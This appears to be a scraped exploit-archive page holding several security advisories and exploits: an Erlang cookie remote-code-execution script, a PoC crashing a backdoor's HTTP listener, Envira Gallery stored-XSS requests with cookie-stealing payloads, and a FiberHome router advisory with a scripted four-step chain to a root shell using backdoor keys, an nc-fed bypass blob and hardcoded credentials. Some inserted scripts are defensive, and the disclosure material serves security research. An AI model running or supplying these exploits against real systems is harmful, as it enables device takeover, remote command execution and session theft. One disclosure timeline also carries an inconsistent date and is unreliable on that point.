      print_error("Exception: #{e.inspect}")
    end

    client.response_timeout = old_timeout
    print_status('End output.')
  end
end
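The module's check method is also the most useful thing on this page for a defender: it encodes, per Windows 10 branch, the first build that shipped the December 2020 fix. The following is an added example, not code from the Metasploit module or from the advisory, that restates those ranges in Python as a patch-verification helper: feed it the output of `cmd.exe /c ver` collected from a host inventory and it reports whether the build is inside a vulnerable range, is a patched build of a listed branch, or belongs to a branch the module does not list. Branch labels follow the comments in the module (17134 is Windows 10 v1803); the sample `ver` strings are constructed.

```python
import re

# Vulnerable ranges as listed in the module's check method:
# (branch label, first vulnerable build, first fixed build).
VULNERABLE_RANGES = [
    ("Windows 10 20H2",  (10, 0, 19042, 0), (10, 0, 19042, 685)),
    ("Windows 10 20H1",  (10, 0, 19041, 0), (10, 0, 19041, 685)),
    ("Windows 10 v1909", (10, 0, 18363, 0), (10, 0, 18363, 1256)),
    ("Windows 10 v1903", (10, 0, 18362, 0), (10, 0, 18362, 1256)),
    ("Windows 10 v1809", (10, 0, 17763, 0), (10, 0, 17763, 1637)),
    ("Windows 10 v1803", (10, 0, 17134, 0), (10, 0, 17134, 1902)),
]

def parse_build(ver_output):
    """Extract the dotted build number from `cmd.exe /c ver` output, e.g.
    'Microsoft Windows [Version 10.0.19041.630]' -> (10, 0, 19041, 630).
    Returns None when no four-part number is present."""
    m = re.search(r"\d+\.\d+\.\d+\.\d+", ver_output)
    if m is None:
        return None
    return tuple(int(x) for x in m.group(0).split("."))

def assess(ver_output):
    """Classify a host as ('vulnerable', branch), ('patched', branch),
    ('not-listed', None) or ('unknown', None)."""
    build = parse_build(ver_output)
    if build is None:
        return ("unknown", None)
    for label, first_vuln, first_fixed in VULNERABLE_RANGES:
        # tuples compare element by element, so this is a plain version comparison
        if first_vuln <= build < first_fixed:
            return ("vulnerable", label)
        if build[:3] == first_vuln[:3]:
            # same branch, but at or beyond the December 2020 build
            return ("patched", label)
    return ("not-listed", None)

if __name__ == "__main__":
    # constructed sample inventory lines
    for host, ver in [
        ("ws01", "Microsoft Windows [Version 10.0.19041.630]"),
        ("ws02", "Microsoft Windows [Version 10.0.19041.685]"),
        ("ws03", "Microsoft Windows [Version 10.0.17134.1902]"),
        ("ws04", "Microsoft Windows [Version 10.0.19043.1]"),
    ]:
        print(host, *assess(ver))
```

A "not-listed" result only means the build is outside the six branches the module names; it is not a statement that the host is safe.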

Erlang Cookie Remote Code Execution


Erlang makes use of a cookie that can be leveraged to achieve remote code execution.


MD5 | f0614ff7536574d91d20ea97b35c5f74

# Exploit Title: Erlang Cookie - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: 1F98D
# Original Author: Milton Valencia (wetw0rk)
# Software Link: https://www.erlang.org/
# Version: N/A
# Tested on: Debian 9.11 (x64)
# References:
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
#
# Erlang allows distributed Erlang instances to connect and remotely execute commands.
# Nodes are permitted to connect to each other if they share an authentication cookie;
# this cookie is commonly called ".erlang.cookie".
#
#!/usr/local/bin/python3

import socket
from hashlib import md5
import struct
import sys

TARGET = "192.168.1.1"
PORT = 25672
COOKIE = "XXXXXXXXXXXXXXXXXXXX"
CMD = "whoami"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))

name_msg = b"\x00"
name_msg += b"\x15"
name_msg += b"n"
name_msg += b"\x00\x07"
name_msg += b"\x00\x03\x49\x9c"
name_msg += b"AAAAAA@AAAAAAA"

s.send(name_msg)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]

print("Extracted challenge: {}".format(challenge))

challenge_reply = b"\x00\x15"
challenge_reply += b"r"
challenge_reply += b"\x01\x02\x03\x04"
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()

s.send(challenge_reply)
challenge_res = s.recv(1024)
if len(challenge_res) == 0:
print("Authentication failed, exiting")
sys.exit(1)

print("Authentication successful")

ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
msg += struct.pack(">H", len(CMD))
msg += bytes(CMD, 'ascii')
msg += b'jw\x04user'

payload = b'\x70' + ctrl + msg
payload = struct.pack('!I', len(payload)) + payload
print("Sending cmd: '{}'".format(CMD))
s.send(payload)
print(s.recv(1024))
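The script above shows why the cookie is the whole of the security boundary: a node proves it is allowed to join by returning MD5(cookie || challenge), so anyone who reads the file, or who can guess the cookie, is indistinguishable from a legitimate node. The following is an added example, not part of the exploit or of Erlang/OTP, that simulates that one step of the handshake from both sides in Python: the "server" issues a challenge, the "client" builds the same 'r' message the PoC sends, and the server verifies it with a constant-time comparison. The real handshake is mutual (the server then answers the client's own challenge), which is omitted here, and the cookie value is constructed.

```python
import hmac
import os
import struct
from hashlib import md5

# Constructed cookie for the simulation (not any real node's .erlang.cookie).
COOKIE = "EXAMPLECOOKIEABCDEFG"

def gen_digest(cookie, challenge):
    """MD5(cookie || decimal challenge): the only proof of identity in the handshake."""
    return md5(cookie.encode("ascii") + str(challenge).encode("ascii")).digest()

def new_challenge():
    """A node's 32-bit challenge, drawn from the OS RNG."""
    return struct.unpack(">I", os.urandom(4))[0]

def build_challenge_reply(cookie, challenge, own_challenge=0x01020304):
    """Client side 'r' message: 2-byte length, 'r', the client's own challenge, the digest.
    The length field counts the 21 bytes after it, hence the \\x00\\x15 in the PoC."""
    body = b"r" + struct.pack(">I", own_challenge) + gen_digest(cookie, challenge)
    return struct.pack(">H", len(body)) + body

def verify_challenge_reply(cookie, challenge, reply):
    """Server side: reject malformed replies, then compare digests in constant time."""
    if len(reply) < 2:
        return False
    (length,) = struct.unpack(">H", reply[:2])
    body = reply[2:]
    if length != 21 or len(body) != 21 or body[:1] != b"r":
        return False
    return hmac.compare_digest(body[5:], gen_digest(cookie, challenge))

if __name__ == "__main__":
    challenge = new_challenge()                      # server -> client
    reply = build_challenge_reply(COOKIE, challenge)  # client -> server
    print("correct cookie accepted:", verify_challenge_reply(COOKIE, challenge, reply))
    print("wrong cookie accepted:  ", verify_challenge_reply("WRONGCOOKIEWRONGCOOKI", challenge, reply))
```

Nothing in this exchange binds the digest to a host, a user or a time, which is why exposing the distribution port beyond the cluster network, or sharing one cookie across environments, turns a cookie leak into remote command execution on every node.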



Backdoor.Win32.Kurbadur.a Remote Stack Buffer Overflow


Backdoor.Win32.Kurbadur.a malware suffers from a remote stack buffer overflow vulnerability.


MD5 | d7e25699281dd539a431c9cfb0f980e8

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/821d3d5a9b15dc3388fe17f233cce296.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Kurbadur.a
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 21220; sending successive HTTP TRACE requests with an increasing payload size triggers a stack buffer overflow that overwrites EIP.
On launch a fake error message box appears, and the specimen also tries to connect to SMTP port 25.

Type: PE32
MD5: 821d3d5a9b15dc3388fe17f233cce296
Vuln ID: MVID-2021-2023
Dropped files: Crss.exe
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/12/2021

Memory Dump:
*** WARNING: Unable to verify checksum for Crss.exe
*** ERROR: Module load completed but symbols could not be loaded for Crss.exe
Crss+0x1c5a:
00011c5a 8902 mov dword ptr [edx],eax ds:002b:41414141=????????
0:000> .ecxr
eax=41414141 ebx=04208a38 ecx=41414141 edx=41414141 esi=00000014 edi=000ac614
eip=00011c5a esp=0040143c ebp=000ac618 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Crss+0x1c5a:
00011c5a 8902 mov dword ptr [edx],eax ds:002b:41414141=????????

0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
Crss+1c5a
00011c5a 8902 mov dword ptr [edx],eax

EXCEPTION_RECORD: 004feb08 -- (.exr 0x4feb08)
ExceptionAddress: 00011c5a (Crss+0x00001c5a)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 41414141
Attempt to write to address 41414141

PROCESS_NAME: Crss.exe

OVERLAPPED_MODULE: Address regions for 'mswsock' and 'dataexchange.dll' overlap

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000001

EXCEPTION_PARAMETER2: 41414141

WRITE_ADDRESS: 41414141

FOLLOWUP_IP:
user32!_InternalCallWinProc+0
764ee090 55 push ebp

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

CONTEXT: 004feb58 -- (.cxr 0x4feb58)
eax=41414141 ebx=04208a38 ecx=41414141 edx=41414141 esi=0000001c edi=000ac614
eip=00011c5a esp=004fefb8 ebp=000ac618 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
Crss+0x1c5a:
00011c5a 8902 mov dword ptr [edx],eax ds:002b:41414141=????????
Resetting default scope

ADDITIONAL_DEBUG_TEXT: Followup set based on attribute [Is_ChosenCrashFollowupThread] from Frame:[0] on thread:[PSEUDO_THREAD]

LAST_CONTROL_TRANSFER: from 000120fe to 00011c5a

FAULTING_THREAD: ffffffff

BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_STACK_OVERFLOW_INVALID_POINTER_WRITE_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141

STACK_TEXT:
004fefb8 00011c5a crss+0x1c5a
004fefc0 000120fe crss+0x20fe
004fefd4 000122a0 crss+0x22a0
004feffc 00012727 crss+0x2727
004ff0fc 000a786d crss+0x9786d
004ff8c4 0006fc0d crss+0x5fc0d
004ff8d8 0006eb95 crss+0x5eb95
004ff8fc 0006f11c crss+0x5f11c
004ff920 0002d1d2 crss+0x1d1d2
004ff938 764ee0bb user32!_InternalCallWinProc+0x2b
004ff964 764f8849 user32!InternalCallWinProc+0x20
004ff988 764fb145 user32!UserCallWinProcCheckWow+0x1be
004ffa58 764e90dc user32!DispatchMessageWorker+0x4ac
004ffac4 764e38c0 user32!DispatchMessageA+0x10
004ffacc 0006b6f4 crss+0x5b6f4
004ffb6c 0007b1c2 crss+0x6b1c2
004ffb94 0007ce34 crss+0x6ce34
004ffbd8 0007e141 crss+0x6e141
004ffc10 0007e252 crss+0x6e252
004ffc44 0007ecd7 crss+0x6ecd7
004ffc7c 0007dbdc crss+0x6dbdc
004ffccc 000a1115 crss+0x91115
004ffd2c 000a1b8c crss+0x91b8c
004ffde4 00064483 crss+0x54483
004ffe08 00064163 crss+0x54163
004fff4c 0006b864 crss+0x5b864
004fff70 000a8450 crss+0x98450
004fff88 76e38654 kernel32!BaseThreadInitThunk+0x24
004fff9c 773c4a77 ntdll!__RtlUserThreadStart+0x2f
004fffe4 773c4a47 ntdll!_RtlUserThreadStart+0x1b


SYMBOL_NAME: user32!_InternalCallWinProc+0

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: user32

IMAGE_NAME: user32.dll

DEBUG_FLR_IMAGE_TIMESTAMP: 0

STACK_COMMAND: .cxr 00000000004FEB58 ; kb ; dds 4fefb8 ; kb

FAILURE_BUCKET_ID: STRING_DEREFERENCE_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_user32.dll!_InternalCallWinProc





Exploit/PoC:
from socket import *
import time

MALWARE_HOST = "x.x.x.x"   # host running the infected sample
PORT = 21220               # port the backdoor listens on
sz = 2000                  # starting length of the junk buffer
c = 1                      # connection counter

def doit():
    global c, sz
    while True:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((MALWARE_HOST, PORT))
        s.settimeout(0.2)
        sz += 1000                     # grow the buffer on every attempt
        JUNK = "A" * sz
        # oversized request line and Host header overwrite EIP with 0x41414141
        PAYLOAD = "TRACE /" + JUNK + " HTTP/1.1\r\nHTTP/1.0-99999\r\nHost: " + JUNK + "\r\n\r\n"
        s.sendall(PAYLOAD.encode())    # bytes on Python 3, unchanged on Python 2
        s.close()
        time.sleep(0.2)
        c += 1
        if c == 60:
            print("Backdoor.Win32.Kurbadur.a / Remote Stack Buffer Overflow")
            print("MD5: 821d3d5a9b15dc3388fe17f233cce296")
            print("By Malvuln")
            break

if __name__ == "__main__":
    doit()



Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Envira Gallery Lite 1.8.3.2 Cross Site Scripting


Envira Gallery Lite edition version 1.8.3.2 suffers from a cross site scripting vulnerability.


MD5 | 4f29341ba3923a4083599b429f88437b

==== [Tempest Security Intelligence - ADV-12/2020] =============================

Envira Gallery - Lite Edition - Version 1.8.3.2
Author: Rodolfo Tavares
Tempest Security Intelligence - Recife, Pernambuco - Brazil


===== [Table of Contents] ================================================
• Overview
• Detailed description
• Disclosure timeline
• Acknowledgements
• References


===== [Vulnerability Information] ===========================================
Category: Improper Neutralization of Input During Web Page Generation
('Cross-site Scripting') [CWE-79]
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N


===== [Overview] ======================================================
Affected system: Envira Gallery – Lite Edition
Software version: Lite - 1.8.3.2
Impacts: The end user's browser has no way to know that the script
should not be trusted, and ends up executing it. Since the browser
believes the script comes from a trusted source, it can access any
cookies, session tokens and other sensitive information retained by the
browser and used on the website. The script can also redirect the
victim to a malicious website in order to perform a phishing attack or
steal information.


==== [Detailed description] ================================================
Envira Gallery Lite Edition - Version 1.8.3.2 is vulnerable to an XSS that
is stored through the meta[title] parameter and a second XSS, which is
stored through the post_title parameter.




[1]- XSS located at http://localhost:8080/wp-admin/post.php and stored
through the post_title parameter:
To exploit it, POST to post.php with a post_title value that contains a
double quote (") to close the current attribute, followed by a JavaScript
payload in a new event-handler attribute, as shown in the example below:


POST /wp-admin/post.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1771
Origin: http://localhost:8080
Connection: close
Cookie: [cookies]
_wpnonce=2671a27a51&_wp_http_referer=/wp-admin/post.php?post=2933&action=edit&user_ID=2&action=editpost&originalaction=editpost&post_author=2&post_type=envira&original_post_status=publish&referredby=http://localhost:8080/wp-admin/edit.php?post_type=envira&_wp_original_http_referer=http://localhost:8080/wp-admin/edit.php?post_type=envira&post_ID=2933&meta-box-order-nonce=3751b8aa86&closedpostboxesnonce=d58bcab0d3&post_title=nf3"onfocus="alert(2)"autofocus="n3fx8&samplepermalinknonce=24f9403378&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=16&aa=2020&hh=14&mn=22&ss=03&hidden_mm=12&cur_mm=12&hidden_jj=16&cur_jj=16&hidden_aa=2020&cur_aa=2020&hidden_hh=14&cur_hh=20&hidden_mn=22&cur_mn=09&original_publish=Update&save=Update&_envira_gallery[type]=default&async-upload=&post_id=2933&envira-gallery=031bef86cc&_wp_http_referer=/wp-admin/post.php?post=2933&action=edit&_envira_gallery[type_default]=1&_envira_gallery[columns]=0&_envira_gallery[lazy_loading]=1&_envira_gallery[lazy_loading_delay]=500&_envira_gallery[justified_row_height]=150&_envira_gallery[justified_margins]=1&_envira_gallery[gallery_theme]=base&_envira_gallery[gutter]=10&_envira_gallery[margin]=10&_envira_gallery[image_size]=default&_envira_gallery[crop_width]=640&_envira_gallery[crop_height]=480&_envira_gallery[lightbox_enabled]=1&_envira_gallery[lightbox_theme]=base&_envira_gallery[lightbox_image_size]=default&_envira_gallery[title_display]=float&_envira_gallery[title]=nf3&_envira_gallery[slug]=change-the-gallery-title&_envira_gallery[classes]=





[2]- XSS stored at [/wp-admin/admin-ajax.php]
To exploit it, POST to wp-admin/admin-ajax.php with a meta[title] value
that contains a double quote (") to close the current attribute, followed
by a JavaScript payload in a new event-handler attribute, as shown in the
example below:


POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/post.php?post=2931&action=edit
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://localhost:8080
Connection: close
Cookie: [cookies]
nonce=bb7f61ad8e&post_id=2931&attach_id=2937&meta[id]=2937&meta[title]=bug"onmousemove="alert(document.cookie)&meta[caption]=&meta[alt]=&meta[link]=&meta[status]=active&meta[src]=&meta[thumb]=&meta[_thumbnail]=&action=envira_gallery_save_meta
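Both findings are the same bug in two places: a stored string lands inside a double-quoted HTML attribute and a `"` in it ends the attribute early. The following script is an added example (mine, not Envira's or WordPress's code) that renders the two payloads above through a hypothetical template, tokenizes the result the way a browser would, and shows that attribute-context escaping (Python's `html.escape(quote=True)`, the equivalent of WordPress `esc_attr()`) keeps the stored value intact while leaving no `on*` attribute behind. The template and the `render_*`/`event_handlers` names are this example's own.

```python
import html
from html.parser import HTMLParser

# The two payloads exactly as submitted in the requests above.
POST_TITLE_PAYLOAD = 'nf3"onfocus="alert(2)"autofocus="n3fx8'
META_TITLE_PAYLOAD = 'bug"onmousemove="alert(document.cookie)'


def render_vulnerable(title):
    """Hypothetical template (not Envira's code) that drops the stored
    title straight into a double-quoted attribute."""
    return '<input type="text" name="title" value="%s">' % title


def render_fixed(title):
    """Same template with attribute-context escaping: html.escape(quote=True)
    turns & < > " ' into entities, the equivalent of WordPress esc_attr()."""
    return '<input type="text" name="title" value="%s">' % html.escape(title, quote=True)


class _AttrCollector(HTMLParser):
    """Collect (name, value) attribute pairs the way a tokenizer sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        self.attrs.extend(attrs)


def parsed_attrs(markup):
    p = _AttrCollector()
    p.feed(markup)
    p.close()
    return p.attrs


def event_handlers(markup):
    """Names of on* attributes present after tokenizing: a non-empty list
    means the stored value broke out of its attribute and will run as script."""
    return [name for name, _ in parsed_attrs(markup) if name.startswith("on")]


def attr_value(markup, name):
    """Value of one attribute after tokenizing (entities already decoded)."""
    return dict(parsed_attrs(markup)).get(name)


if __name__ == "__main__":
    for payload in (POST_TITLE_PAYLOAD, META_TITLE_PAYLOAD):
        print("vulnerable:", event_handlers(render_vulnerable(payload)))
        print("fixed     :", event_handlers(render_fixed(payload)),
              "value round-trips:", attr_value(render_fixed(payload), "value") == payload)
```

The point to take away is that the fix is context-specific: `esc_attr()` is right for a quoted attribute, while the same value printed into a `<script>` block or an `href` needs a different escaper, and a `"` that is allowed to stay a `"` inside any of them is the bug.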


==== [Disclosure timeline] ================================================
17/Dec/2020 - Initiated the responsible disclosure with the vendor.
17/Dec/2020 - Envira Gallery confirmed the issue.
18/Dec/2020 - The vendor fixed the first XSS.
19/Dec/2020 - The vendor fixed the second XSS.
22/May/2020 - CVEs were assigned and reserved as CVE-2020-35581 and
CVE-2020-35582.


===== [Acknowledgements] ==============================================
Tempest Security Intelligence [5]


==== [References] ======================================================
[1] https://cwe.mitre.org/data/definitions/79.html
[2] https://github.com/enviragallery/envira-gallery-lite/commit/3b081dd10a1731f8cd981bebeac0e775fb217acf
[4] https://github.com/enviragallery/envira-gallery-lite/commit/102651514e6faca914ec1c7e113def340d8e1e09
[5] https://www.tempest.com.br
==== [EOF] ===========================================================




FiberHome HG6245D Disclosure / Bypass / Privilege Escalation / DoS


FiberHome HG6245D routers suffer from bypass, hard-coded credentials, password disclosure, privilege escalation, denial of service, remote stack overflow, and additional vulnerabilities.


MD5 | 64f5abcb1d25b607eec98356b1ed6c6e

Hello,

Please find a text-only version below sent to security mailing lists.

The complete version on "Multiple vulnerabilities found in FiberHome
HG6245D routers"
is posted here:
https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html


=== text-version of the advisory ===

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

## Advisory Information

Title: Multiple vulnerabilities found in FiberHome HG6245D routers
Advisory URL: https://pierrekim.github.io/advisories/2021-fiberhome-0x00-ont.txt
Blog URL: https://pierrekim.github.io/blog/2021-01-12-fiberhome-ont-0day-vulnerabilities.html
Date published: 2021-01-12
Vendors contacted: None
Release mode: Full-Disclosure
CVE: None yet assigned



## Product Description

FiberHome Technologies is a leading equipment vendor and global
solution provider in the field of information technology and
telecommunications.

The FiberHome HG6245D routers are GPON FTTH routers. They are mainly
used in South America and in Southeast Asia (from Shodan). These
devices come at a competitive price but are very powerful, with a lot
of memory and storage.

I validated the vulnerabilities against HG6245D, RP2602:

Config# show version
show version
Hardware version : WKE2.094.277A01
Software version : RP2602
Minor version : 00.00
Basic part version : RP2602
Generate time : Apr 1 2019 19:38:05

Some vulnerabilities have been tested successfully against another
fiberhome device (AN5506-04-FA, firmware RP2631, 4 April 2019). The
fiberhome devices have quite a similar codebase, so it is likely all
other fiberhome devices (AN5506-04-FA, AN5506-04-FAT, AN5506-04-F) are
also vulnerable.


On first analysis, the attack surface is not huge:
- - only HTTP/HTTPS is listening by default on the LAN
- - it is also possible to enable a CLI telnetd (not reachable by
default) on port 23/tcp by using hardcoded credentials on the web
admin interface (`https://target/fh`).

Furthermore, due to the lack of a firewall for IPv6 connectivity, all the
internal services are reachable over IPv6 (from the Internet).

It is in fact trivial to achieve pre-auth RCE as root against the
device, from the WAN (using IPv6) and from the LAN (IPv4 or IPv6).
This scenario involves reaching the webserver to:
1. enable a proprietary CLI telnetd (using backdoor credentials for
HTTP or using the backdoor `/telnet` HTTP API or using a stack
overflow in the HTTP server in previous fiberhome routers [and
skipping next steps])
2. enable the Linux telnetd using authentication bypass or with
backdoor credentials
3. use backdoor credentials to get a root shell on the Linux telnetd

Example of such a scenario in 4 steps from a different network:

$ curl -k https://target/info.asp
# pre-auth infoleak: extract the WAN MAC, which is very similar to the
# br0 MAC used to enable the next backdoor. On the same network
# segment, `arp -na` gives it directly.
$ curl -k 'https://target/telnet?enable=1&key=ENDING_PART_MAC_ADDR'
# backdoor access: authorizes access to the CLI telnet on port 23/tcp
$ echo GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK | base64 -d | nc target 23 >/dev/null &
# auth bypass + start of the Linux telnetd on port 26/tcp
$ telnet target 26
# backdoor root access with root / GEPON
(none) login: root
Password: [GEPON]
BusyBox v1.27.2 (2019-04-01 19:16:06 CST) built-in shell (ash)
#id
uid=0(root) gid=0 groups=0 # game over
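The four-step chain above, scripted as an added example (mine, not part of the advisory): it turns the WAN MAC leaked by `/info.asp` into the `/telnet` backdoor key and URL, and builds the CLI byte strings that the later sections on the authentication bypass and the CLI DoS document. Two assumptions are baked in and labelled in the code: the br0 MAC is obtained by clearing the low nibble of the last WAN MAC byte (the `x3`/`x0` observation in the pre-auth InfoLeak section), and the key is the last three bytes of the br0 MAC as hex, as in the `AA:AA:AA:01:02:03` -> `010203` example. Nothing here touches the network; the host and MAC are constructed sample values and the output is the list of commands to run by hand.

```python
import base64
import re
from urllib.parse import urlencode

# Constructed sample values for the demo (not a real device).
SAMPLE_HOST = "192.168.1.1"
SAMPLE_WAN_MAC = "aa:aa:aa:01:02:03"

# Base64 blob from the advisory: 0x1a 0x0a, then help/list/who/ddd/tshell.
ADVISORY_BYPASS_B64 = "GgpoZWxwCmxpc3QKd2hvCmRkZAp0c2hlbGwK"

# Section "Telnet server (CLI) - DoS": 13 bytes that crash /fh/extend/load_cli.
CLI_CRASH = b"\x1a\nenable\n\x02\n\x1a\n"


def parse_mac(mac):
    """Accept aa:bb:cc:dd:ee:ff, aa-bb-cc-dd-ee-ff or aabbccddeeff; return 6 raw bytes."""
    digits = re.sub(r"[:\-.]", "", mac.strip())
    if not re.fullmatch(r"[0-9A-Fa-f]{12}", digits):
        raise ValueError("not a MAC address: %r" % mac)
    return bytes.fromhex(digits)


def guess_br0_mac(wan_mac):
    """ASSUMPTION (from the advisory's x3/x0 observation): wan0 and br0 share
    a base MAC and differ only in the low nibble of the last byte, so
    clearing that nibble turns the leaked WAN MAC into the br0 MAC."""
    raw = bytearray(parse_mac(wan_mac))
    raw[5] &= 0xF0
    return bytes(raw)


def telnet_key(mac):
    """Key for /telnet?enable=...&key=: the last three bytes of the br0 MAC
    as lower-case hex, e.g. AA:AA:AA:01:02:03 -> '010203' (assumed from the
    advisory's example; getOnuMac() itself was not reversed here)."""
    raw = parse_mac(mac) if isinstance(mac, str) else bytes(mac)
    return raw[3:].hex()


def backdoor_url(host, key, enable=True):
    """enable=1 adds the iptables ACCEPT for 23/tcp, enable=0 removes it again."""
    return "https://%s/telnet?%s" % (host, urlencode({"enable": int(enable), "key": key}))


def cli_payload(*commands):
    """Input for the CLI telnetd on 23/tcp: 0x1a 0x0a skips the Login: prompt,
    then one command per line ('ddd' then 'tshell' starts the Linux telnetd
    on 26/tcp)."""
    return b"\x1a\n" + "".join(c + "\n" for c in commands).encode()


def bypass_payload_matches_advisory():
    """Sanity check: the builder reproduces the advisory's base64 blob byte for byte."""
    return cli_payload("help", "list", "who", "ddd", "tshell") == base64.b64decode(ADVISORY_BYPASS_B64)


def attack_plan(host, wan_mac):
    """Shell commands for the four steps, keyed by step, plus the cleanup call."""
    key = telnet_key(guess_br0_mac(wan_mac))
    b64 = base64.b64encode(cli_payload("help", "list", "who", "ddd", "tshell")).decode()
    return {
        "1_infoleak": "curl -k https://%s/info.asp" % host,
        "2_open_cli_telnet": "curl -k '%s'" % backdoor_url(host, key),
        "3_bypass_and_start_linux_telnetd":
            "echo %s | base64 -d | nc %s 23 >/dev/null &" % (b64, host),
        "4_root_shell": "telnet %s 26   # root / GEPON" % host,
        "cleanup": "curl -k '%s'" % backdoor_url(host, key, enable=False),
    }


if __name__ == "__main__":
    for step, cmd in attack_plan(SAMPLE_HOST, SAMPLE_WAN_MAC).items():
        print(step, ":", cmd)
```

If the br0 guess is wrong on a given unit, `telnet_key()` accepts the real br0 MAC read from `arp -na` on the LAN segment, which is what the advisory recommends when you are on the same network.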

Please note this research was done in the beginning of 2020 and a new
firmware image may be available and may patch some vulnerabilities
(even if I highly doubt it). This research was supposed to be
presented during a private security event last year which was
postponed due to the COVID-19 situation.

Full-disclosure is applied as it is believed that some backdoors have
been intentionally placed by the vendor.

Also, it is public knowledge from 2019 that Fiberhome devices have
weak passwords and RCE vulnerabilities. This quote is from 2019
(https://blog.netlab.360.com/some-fiberhome-routers-are-being-utilized-as-ssh-tunneling-proxy-nodes-2/):

> We didn't see how Gwmndy malware spread, but we know that some Fiberhome router Web systems have weak passwords and there are RCE vulnerabilities.



## Vulnerabilities Summary

The summary of the vulnerabilities is:

1. Insecure IPv6 connectivity
2. HTTP Server - Passwords in HTTP logs
3. HTTP Server - Hardcoded SSL certificates
4. HTTP server - Pre-auth InfoLeak
5. HTTP Server - Backdoor allowing telnet access
6. HTTP Server - Hardcoded credentials
7. HTTP Server - TR-069 hardcoded credentials
8. HTTP Server - Credentials decryption algorithm
9. Telnet server (Linux) - Hardcoded credentials
10. Telnet server (CLI) - Hardcoded credentials
11. Telnet server (CLI) - Privilege escalation
12. Telnet server (CLI) - Authentication bypass
13. Telnet server (CLI) - Authentication bypass to start the Linux telnetd
14. Telnet server (CLI) - DoS
15. System - Credentials stored in clear-text
16. System - Passwords stored in clear-text in nvram
17. Misc - Remote stack overflow in the HTTP server (AN5506-04-FA / RP2631)

I removed several DoS and strange technical details (linked to
undisclosed vulnerabilities) for clarity.



## Details - Insecure IPv6 connectivity

By default, there are no firewall rules for the IPv6 connectivity,
exposing the internal management interfaces from the Internet.

An attacker can get full access to the management HTTP server (using
hardcoded passwords) and to the telnet services by reaching the IPv6
addresses assigned to the wan0 and br0 interfaces.


On the device:

#ifconfig wan0
wan0 Link encap:Ethernet HWaddr [REMOVED]
[...]
inet6 addr: [REMOVED]/64 Scope:Global
[...]
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

#ifconfig br0
br0 Link encap:Ethernet HWaddr [REMOVED]
inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: [REMOVED]/64 Scope:Global
[...]
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1


